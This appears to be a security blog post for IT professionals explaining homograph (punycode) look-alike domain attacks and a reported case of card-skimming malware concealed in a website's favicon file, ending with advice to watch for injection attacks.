In a previous post, we discussed ways that IT managers can prevent brandjacking of their domains and their businesses. The advice in that post has plenty of good advice, but there is another dimension to the brandjacking effort, and that is for criminals to use homoglyph or homograph attacks. These attacks are also called international domain names or punycode attacks. Regardless of their exact name, the idea behind these attacks is simple to explain, with a bit of Internet history.

When the Internet was first created, it was based on using Roman alphabets in domain names. This is the character set that is used by many of the world’s languages, but not all of them. As the Internet expanded across the globe, it connected countries where other alphabets were in use: think Arabic or Mandarin.

So the international domain name standards were created to handle non-Roman alphabet characters for domains and URLs. The way you can tell is that the domains begin with the Roman letters “xn-” to indicate the non-Roman characters to follow. This is useful because you don’t necessarily want everyone to learn Roman alphabets if they speak a language that uses other character sets.

The trouble is that many of these characters look very similar to the Roman ones that you and I use in English. For example the lowercase “a” in Cyrillic looks exactly like the lower case Roman “a.” Spammers purchased domains that looked just like the all-Roman letters, with one or two changes using some other character set. Several years ago, researchers discovered this ploy, and since then all modern browsers have been updated to recognize the homograph attack methods of using “xn–80ak6aa92e.com” instead of “apple.com.” Go ahead, try typing the term into your browser’s URL bar, it won’t be resolved. But back in the day, this would bring up what looked like the ordinary Apple webpage, cleverly copied by some scammer to fool the unsuspecting user.

The homograph attacks differ from ordinary typosquatting: these are domains such as googel.com that are specifically purchased by spammers because of lousy typists who are in a hurry and don’t check their work. Most modern browsers also automatically correct for this, by the way. Isn’t it nice that we have some smart coders who can figure out our foibles? (That is a rhetorical question, don’t answer it.)

New Homograph Attacks Discovered

Most security researchers figured the homograph problem was solved, but of course in the cat-and-mouse world of malware it is only a matter of time before something tips the balance back to favor the attackers. This was the case with a recent discovery by Malwarebytes about how the Inter skimming malware kit was combined with favicons with a new homograph attack.

Favicons are the small icons that precede the URL text in a browser’s entry field. Most browsers ignore them, but you can still see them if you show your bookmarks list or if you specify the URL that links to them, such as here for Google’s colorful G (shown below). They used to be an indicator that you were browsing the expecting site, but now browsers use more sophisticated checks so they have fallen out of favor.

The latest ploy is to compromise the .ico file used to generate the favicon for a site, and pack it with a piece of malware.  This is how Malwarebytes found it. This is a more sophisticated injection attack, where the malware puts code to take advantage of a website. The goal of this  attacker is to abuse a payment webpage and steal your credit card data. The researchers tracked several domains that were using the hacked favicon to gain access to various ecommerce sites. We covered skimming and eCommerce here:

Fortunately, this story has a happy ending: once the researchers  figured out the attack sequence, they contacted the domain owners to warn them. They found that they already discovered the skimmer and had removed the code. What this shows however is the lengths that adversaries will go through to compromise your websites, and how you need to be on the lookout for anything suspicious. And how the online criminal world continues to evolve and try to figure out ways to get around our defenses.

There is an important lesson here for IT professionals: be on the lookout for injection-style attacks across your web infrastructure.  Every element of your webpages can be compromised, even rarely-used tiny icon files.